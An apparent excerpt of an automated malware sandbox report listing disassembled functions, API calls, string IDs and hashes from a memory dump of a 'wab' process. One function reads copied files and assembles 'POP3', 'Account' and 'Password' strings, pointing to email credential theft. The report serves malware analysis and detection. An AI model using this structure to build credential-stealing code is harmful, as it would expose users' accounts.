                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 3f8672f23fe803022ee4a55a10f9628701acfcf38f1d3990a9403b22b937f6cf
                    • Instruction ID: c7884dd59fb430c0c8687f0a3cb81fcaa5b02854e6ce3e8b824b3e4c9c8be142
                    • Opcode Fuzzy Hash: 3f8672f23fe803022ee4a55a10f9628701acfcf38f1d3990a9403b22b937f6cf
                    • Instruction Fuzzy Hash: ABE046368002C9AFDF026F29CD08A893F2FEF01395B004014FA858B029DB3AD952DB8C
                    Function 21366580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: 15bcca141526c1e6bdb8316b77091c70b1a6f996419890aec713f8045fedc015
                    • Instruction ID: b6a32f05e3d7200b909468a54a11b3701919f3b02eda6b4580bea1a54f69b48a
                    • Opcode Fuzzy Hash: 15bcca141526c1e6bdb8316b77091c70b1a6f996419890aec713f8045fedc015
                    • Instruction Fuzzy Hash: CD315CB1800189AFDB158F78CC84EEB7BBFDF86358F00019CE519D7159E6319E418B94
                    Function 2136724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: 885a3dfc040703da39fc67c1682062fa7deb00c1567c8c0b4cf02327c9ef896b
                    • Instruction ID: c37b87282d452d71f645d30a374c260552d9db9a972a33d23ca33bda02c15683
                    • Opcode Fuzzy Hash: 885a3dfc040703da39fc67c1682062fa7deb00c1567c8c0b4cf02327c9ef896b
                    • Instruction Fuzzy Hash: B6A011302802028F83028E32830A20E3AAEAA082C03000028A888C8020FB2880028B0A
                    Function 2136173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 277 2136173a-213617fe call 2136c030 call 21362c40 * 2 284 21361803 call 21361cca 277->284 285 21361808-2136180c 284->285 286 21361812-21361816 285->286 287 213619ad-213619b1 285->287 286->287 288 2136181c-21361837 call 21361ede 286->288 291 2136199f-213619ac call 21361ee7 * 2 288->291 292 2136183d-21361845 288->292 291->287 293 21361982-21361985 292->293 294 2136184b-2136184e 292->294 297 21361987 293->297 298 21361995-21361999 293->298 294->293 299 21361854-21361881 call 213644b0 * 2 call 21361db7 294->299 301 2136198a-2136198d call 21362c40 297->301 298->291 298->292 311 21361887-2136189f call 213644b0 call 21361db7 299->311 312 2136193d-21361943 299->312 306 21361992 301->306 306->298 311->312 328 213618a5-213618a8 311->328 314 21361945-21361947 312->314 315 2136197e-21361980 312->315 314->315 317 21361949-2136194b 314->317 315->301 319 21361961-2136197c call 213616aa 317->319 320 2136194d-2136194f 317->320 319->306 321 21361955-21361957 320->321 322 21361951-21361953 320->322 325 2136195d-2136195f 321->325 326 21361959-2136195b 321->326 322->319 322->321 325->315 325->319 326->319 326->325 329 213618c4-213618dc call 213644b0 call 21361db7 328->329 330 213618aa-213618c2 call 213644b0 call 21361db7 328->330 329->298 339 213618e2-2136193b call 213616aa call 213615da call 21362c40 * 2 329->339 330->329 330->339 339->298
                    APIs
                      • Part of subcall function 21361CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D1B
                      • Part of subcall function 21361CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21361D37
                      • Part of subcall function 21361CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D4B
                    • _strlen.LIBCMT ref: 21361855
                    • _strlen.LIBCMT ref: 21361869
                    • _strlen.LIBCMT ref: 2136188B
                    • _strlen.LIBCMT ref: 213618AE
                    • _strlen.LIBCMT ref: 213618C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _strlen$File$CopyCreateDelete
                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                    • API String ID: 3296212668-3023110444
                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                    • Instruction ID: c02240d51e8d48544e1c596d1b8b41446de8fb6c395633f1806577e2042ab567
                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                    • Instruction Fuzzy Hash: 6A61FA71D00299AFEF118BA8C840BDEBBFFAF96318F00445AD5047725CDB745A45CB99
                    Function 213619B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: %m$~$Gon~$~F@7$~dra
                    • API String ID: 4218353326-230879103
                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                    • Instruction ID: 100bb739b789fb89d0381a4ffb9af6fa576bc04440fdf43ba07af6b0782d2b25
                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                    • Instruction Fuzzy Hash: 51716B71D002A95FDF129BB88C84ADF7BFEAF56318F10009AD644E3249E634D785CBA4
                    Function 21367CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 21367D06
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 213690D7
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 213690E9
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 213690FB
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 2136910D
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 2136911F
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 21369131
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 21369143
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 21369155
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 21369167
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 21369179
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 2136918B
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 2136919D
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 213691AF
                    • _free.LIBCMT ref: 21367CFB
                      • Part of subcall function 2136571E: HeapFree.KERNEL32(00000000,00000000,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?), ref: 21365734
                      • Part of subcall function 2136571E: GetLastError.KERNEL32(?,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?,?), ref: 21365746
                    • _free.LIBCMT ref: 21367D1D
                    • _free.LIBCMT ref: 21367D32
                    • _free.LIBCMT ref: 21367D3D
                    • _free.LIBCMT ref: 21367D5F
                    • _free.LIBCMT ref: 21367D72
                    • _free.LIBCMT ref: 21367D80
                    • _free.LIBCMT ref: 21367D8B
                    • _free.LIBCMT ref: 21367DC3
                    • _free.LIBCMT ref: 21367DCA
                    • _free.LIBCMT ref: 21367DE7
                    • _free.LIBCMT ref: 21367DFF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: c6b65b79ece7574e9fa6ef23ad6e27f352a9243aaf91f814c5d1f59daa81b269
                    • Instruction ID: 58d5b971bbb5c4a043b715bba5020a37679d1ee40d08fe2666a9b8c589cddb50
                    • Opcode Fuzzy Hash: c6b65b79ece7574e9fa6ef23ad6e27f352a9243aaf91f814c5d1f59daa81b269
                    • Instruction Fuzzy Hash: 0F31833350028ADFEB219F38D840B66BBEFEF11358F644829E548D7559DE35E980CB18
                    Function 213659D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 213659EA
                      • Part of subcall function 2136571E: HeapFree.KERNEL32(00000000,00000000,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?), ref: 21365734
                      • Part of subcall function 2136571E: GetLastError.KERNEL32(?,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?,?), ref: 21365746
                    • _free.LIBCMT ref: 213659F6
                    • _free.LIBCMT ref: 21365A01
                    • _free.LIBCMT ref: 21365A0C
                    • _free.LIBCMT ref: 21365A17
                    • _free.LIBCMT ref: 21365A22
                    • _free.LIBCMT ref: 21365A2D
                    • _free.LIBCMT ref: 21365A38
                    • _free.LIBCMT ref: 21365A43
                    • _free.LIBCMT ref: 21365A51
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: db3df02e66f012a50d6f590d5ec75c9d6ec115f5d47787f9fd8296549ded96b3
                    • Instruction ID: b2b4d237df3c696a2876c09970494d49d2173e8d6bcc339dd2b658df7d908e33
                    • Opcode Fuzzy Hash: db3df02e66f012a50d6f590d5ec75c9d6ec115f5d47787f9fd8296549ded96b3
                    • Instruction Fuzzy Hash: 3D11B97A51018EFFCB21DF58C841CDD3FAAEF14394B0940A5BA088F529DA35DE509B84
                    Function 2136AA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 109b894d0beb068c350b6675e996f044b6f974cb9d5fa105310a36a6461f0b30
                    • Instruction ID: da27428bb4f333ea04d3aaed5d541f77a1b7dc60f868eaf6a1dd39f41206bf00
                    • Opcode Fuzzy Hash: 109b894d0beb068c350b6675e996f044b6f974cb9d5fa105310a36a6461f0b30
                    • Instruction Fuzzy Hash: 62517C7590058ECBDF009FA8E58459CBFBFFB0A218F104599D581AB25CCB758EA4CB1C
                    Function 21361CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                    Download Yara Rule
                    APIs
                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D1B
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21361D37
                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D4B
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D58
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D72
                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D7D
                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D8A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                    • String ID:
                    • API String ID: 1454806937-0
                    • Opcode ID: f626b5fc2dc434b1fe55f7873eb5560b195b55d383c14da86c0f68bc3ba10887
                    • Instruction ID: f98e9cde2e2ecd6b0b0d3d4a860aa40a0e6a71c29849a9a209b31dd2ac1ecf46
                    • Opcode Fuzzy Hash: f626b5fc2dc434b1fe55f7873eb5560b195b55d383c14da86c0f68bc3ba10887
                    • Instruction Fuzzy Hash: 0A21C1B1D4125CBFDB11DBA18C8CEEB77BDEB58398F000865F501D2144D6748E418B78
                    Function 21369492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21369C07,?,00000000,?,00000000,00000000), ref: 213694D4
                    • __fassign.LIBCMT ref: 2136954F
                    • __fassign.LIBCMT ref: 2136956A
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 21369590
                    • WriteFile.KERNEL32(?,?,00000000,21369C07,00000000,?,?,?,?,?,?,?,?,?,21369C07,?), ref: 213695AF
                    • WriteFile.KERNEL32(?,?,?,21369C07,00000000,?,?,?,?,?,?,?,?,?,21369C07,?), ref: 213695E8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: e63b9f23c40853ce3f5ad6a508b696a40bacd8507d5c94769e73a38907da15f1
                    • Instruction ID: d64c0d3d7630c4e66245b04c4c4deae231092f5cff334973680e6646124d9e7a
                    • Opcode Fuzzy Hash: e63b9f23c40853ce3f5ad6a508b696a40bacd8507d5c94769e73a38907da15f1
                    • Instruction Fuzzy Hash: F051E5B0D40289DFDB05CFA8C895AEEBBFEEF09324F10411AE551E7295E7709941CB64
                    Function 21363370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                    Download Yara Rule
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 2136339B
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 213633A3
                    • _ValidateLocalCookies.LIBCMT ref: 21363431
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 2136345C
                    • _ValidateLocalCookies.LIBCMT ref: 213634B1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 1170836740-1018135373
                    • Opcode ID: 73945e31004e20ba085e56065fd9cbaba2ac1fe5fb8d1da333dc1c73889e44bd
                    • Instruction ID: 3032aee4f778a6433855992e6d906f8d76c14166112a2ff27fc6acf1c44c1351
                    • Opcode Fuzzy Hash: 73945e31004e20ba085e56065fd9cbaba2ac1fe5fb8d1da333dc1c73889e44bd
                    • Instruction Fuzzy Hash: 3041D838A002899FDB02CF69C840A9FBFBFAF4532CF148159D9296B359D735DA01CB95
                    Function 2136925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 21369221: _free.LIBCMT ref: 2136924A
                    • _free.LIBCMT ref: 213692AB
                      • Part of subcall function 2136571E: HeapFree.KERNEL32(00000000,00000000,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?), ref: 21365734
                      • Part of subcall function 2136571E: GetLastError.KERNEL32(?,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?,?), ref: 21365746
                    • _free.LIBCMT ref: 213692B6
                    • _free.LIBCMT ref: 213692C1
                    • _free.LIBCMT ref: 21369315
                    • _free.LIBCMT ref: 21369320
                    • _free.LIBCMT ref: 2136932B
                    • _free.LIBCMT ref: 21369336
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                    • Instruction ID: f720fd1306f584946bc7e40b9b5984d1a2d5266f12889cad969cb748d1e82b33
                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                    • Instruction Fuzzy Hash: BB11AF32540B8EEED630ABB4CC45FCB7B9E9F14308F400824A6997A056DA3AB4404749
                    Function 21368821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,21366FFD,00000000,?,?,?,21368A72,?,?,00000100), ref: 2136887B
                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,21368A72,?,?,00000100,5EFC4D8B,?,?), ref: 21368901
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 213689FB
                    • __freea.LIBCMT ref: 21368A08
                      • Part of subcall function 213656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21365702
                    • __freea.LIBCMT ref: 21368A11
                    • __freea.LIBCMT ref: 21368A36
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                    • String ID:
                    • API String ID: 1414292761-0
                    • Opcode ID: ccef8bcfed86857d67e7f1aa3ba5ede26f43a790db4f5a3108b470d5df786a16
                    • Instruction ID: f411682e85cf3abce422834a5113afc2df84cd7793fa3335a78492b5f9189143
                    • Opcode Fuzzy Hash: ccef8bcfed86857d67e7f1aa3ba5ede26f43a790db4f5a3108b470d5df786a16
                    • Instruction Fuzzy Hash: 2051D072610386AFEB158E64CC40EAF3BAFEB4975CF1006B8ED04D6148EB35DC508B99
                    Function 213615DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                    Download Yara Rule
                    APIs
                    • _strlen.LIBCMT ref: 21361607
                    • _strcat.LIBCMT ref: 2136161D
                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2136190E,?,?,00000000,?,00000000), ref: 21361643
                    • lstrcatW.KERNEL32(?,?), ref: 2136165A
                    • lstrlenW.KERNEL32(?,?,?,?,?,2136190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21361661
                    • lstrcatW.KERNEL32(00001008,?), ref: 21361686
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrcatlstrlen$_strcat_strlen
                    • String ID:
                    • API String ID: 1922816806-0
                    • Opcode ID: 854d8f4993d68dd89ade6952b075e10418996f001d0f3cadca8acfb40b827bee
                    • Instruction ID: 9a4b3f0249b2c85deaabc2db5c879d2d7f45ab92c24f9dd0f803c3c61d6fbf30
                    • Opcode Fuzzy Hash: 854d8f4993d68dd89ade6952b075e10418996f001d0f3cadca8acfb40b827bee
                    • Instruction Fuzzy Hash: 7E21F836D00245AFCB019F69EC81EEE77BEEF88724F14441AE904AB148DB34A94187AD
                    Function 21361000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrcatW.KERNEL32(?,?), ref: 21361038
                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2136104B
                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21361061
                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21361075
                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21361090
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 213610B8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$AttributesFilelstrcat
                    • String ID:
                    • API String ID: 3594823470-0
                    • Opcode ID: edd107b8031da6aa33b7a90d22479c82784797f472cd2795bc2c91c69c6e0cc1
                    • Instruction ID: 5b9081654d99a7d95f72754298d3cb6df94334ea32c0634eabeb801d8a488513
                    • Opcode Fuzzy Hash: edd107b8031da6aa33b7a90d22479c82784797f472cd2795bc2c91c69c6e0cc1
                    • Instruction Fuzzy Hash: 8121A135E00399ABCF60DB65DC48EDB377EEFC4318F104296E959931A5DA309A85CB84
                    Function 21363856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,21363518,213623F1,21361F17), ref: 21363864
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 21363872
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2136388B
                    • SetLastError.KERNEL32(00000000,?,21363518,213623F1,21361F17), ref: 213638DD
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 8cc3b11ad725e9da2ce81c3cb01d06624bfa190ed2b707b58f8fb65b54cfd185
                    • Instruction ID: cea06a156b77a2acd7d2be6bc939ec331997ea8e7c895329745684fb707deeed
                    • Opcode Fuzzy Hash: 8cc3b11ad725e9da2ce81c3cb01d06624bfa190ed2b707b58f8fb65b54cfd185
                    • Instruction Fuzzy Hash: 6E01FC3368D7925DA303167E6C849972F5FEB5777C7200239E139950E9FF654805434C
                    Function 21365AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,21366C6C), ref: 21365AFA
                    • _free.LIBCMT ref: 21365B2D
                    • _free.LIBCMT ref: 21365B55
                    • SetLastError.KERNEL32(00000000,?,?,21366C6C), ref: 21365B62
                    • SetLastError.KERNEL32(00000000,?,?,21366C6C), ref: 21365B6E
                    • _abort.LIBCMT ref: 21365B74
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: 90e5907a85356f55b994112e1d68a65cd7930ce5124c55e845c5f0c51136cf0c
                    • Instruction ID: d32bcc3aeafd228b60018d44472a72a56d7be7fb68035d90c5dc19229c1a68c5
                    • Opcode Fuzzy Hash: 90e5907a85356f55b994112e1d68a65cd7930ce5124c55e845c5f0c51136cf0c
                    • Instruction Fuzzy Hash: 7FF0A4335855C2AED70326396C08E4A2A6F8FE26F9B240134FB1597198FE3985024A6C
                    Function 213611EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 21361E89: lstrlenW.KERNEL32(?,?,?,?,?,213610DF,?,?,?,00000000), ref: 21361E9A
                      • Part of subcall function 21361E89: lstrcatW.KERNEL32(?,?), ref: 21361EAC
                      • Part of subcall function 21361E89: lstrlenW.KERNEL32(?,?,213610DF,?,?,?,00000000), ref: 21361EB3
                      • Part of subcall function 21361E89: lstrlenW.KERNEL32(?,?,213610DF,?,?,?,00000000), ref: 21361EC8
                      • Part of subcall function 21361E89: lstrcatW.KERNEL32(?,213610DF), ref: 21361ED3
                    • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2136122A
                      • Part of subcall function 2136173A: _strlen.LIBCMT ref: 21361855
                      • Part of subcall function 2136173A: _strlen.LIBCMT ref: 21361869
                    Strings
                    Memory Dump Source
